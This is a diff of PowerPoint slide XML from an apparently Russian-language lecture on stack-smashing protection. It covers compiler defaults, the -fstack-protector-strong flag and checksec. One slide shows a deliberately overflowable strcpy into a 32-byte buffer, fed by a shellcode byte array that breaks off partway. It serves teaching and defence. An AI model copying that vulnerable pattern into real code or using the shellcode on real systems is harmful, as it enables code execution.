-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включен по умолчанию только в компиляторе </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu GCC</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> (нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Fedora </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>нет в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Windows</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендуется явно указывать флаг </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пакеты в Debian</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Ubuntu собираются с этим флагом</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включён в релизной сборке </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>BZ #1503589</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>TODO: Chrome ?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Наличие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>StackProtector</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> можно проверить программой </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632117445"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -6235,6 +6262,229 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0E6EA8-EEE9-4F5E-95E4-71BA6E8B1DD9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включен по умолчанию только в компиляторе </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Fedora </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>нет в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендуется явно указывать флаг </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пакеты в Debian</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ubuntu собираются с этим флагом</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в релизной сборке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>BZ #1503589</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>TODO: Chrome ?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Наличие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>StackProtector</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> можно проверить программой </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>checksec</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1632117445"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CED4C63-C7A0-472B-9743-C26931D99D9F}"/>
               </a:ext>
             </a:extLst>
@@ -6297,7 +6547,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6583,7 +6833,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6812,7 +7062,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7089,7 +7339,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7172,7 +7422,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7417,7 +7667,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7541,7 +7791,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7886,7 +8136,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7973,7 +8223,1112 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A6B8A7-F482-4D39-865D-AE23037064A3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пример</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: Stack Smashing</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA91837-38D1-4A24-925F-DD9873367FD5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="578223" y="1574613"/>
+            <a:ext cx="6468035" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>int main() {</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  char </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>[32];</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>strcpy</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>buf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>, code);</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>// </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Входная строка пользователя </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>const char code[] =</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  "\x31\xc0"    // </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>xorl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> %</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>, %</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>eax</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  "\x50"        // </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pushl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> %</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
